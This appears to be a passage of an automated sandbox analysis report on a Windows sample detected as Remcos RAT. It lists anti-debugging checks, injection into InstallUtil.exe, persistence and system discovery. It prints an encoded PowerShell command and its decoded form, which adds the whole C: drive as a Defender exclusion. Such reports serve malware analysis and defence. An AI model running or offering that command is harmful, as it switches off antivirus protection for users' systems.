Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Last function: Thread delayed

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

17_2_00416FC6

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6076			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1160			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API call chain: ExitProcess graph end node

Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0043F394 mov eax, dword ptr fs:[00000030h]

17_2_0043F394

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_00431347

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040F87E SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

17_2_0040F87E

Enables debug privileges

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431495 SetUnhandledExceptionFilter,	17_2_00431495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00431347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00438462 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00438462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043190C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_0043190C

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_00414EA8

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

17_2_0040FC77

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00415E25 mouse_event,

17_2_00415E25

Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager2ee70d
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0044E1AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044E381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoA,	17_2_0040D39C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_00444444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044492D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DCC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DD0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044DE34

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Users\user\Desktop\kyFBQxVbsg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431590 cpuid

17_2_00431590

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00404F28 GetLocalTime,CreateEventA,CreateThread,

17_2_00404F28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004451D0 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

17_2_004451D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417E20 GetComputerNameExW,GetUserNameW,

17_2_00417E20

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
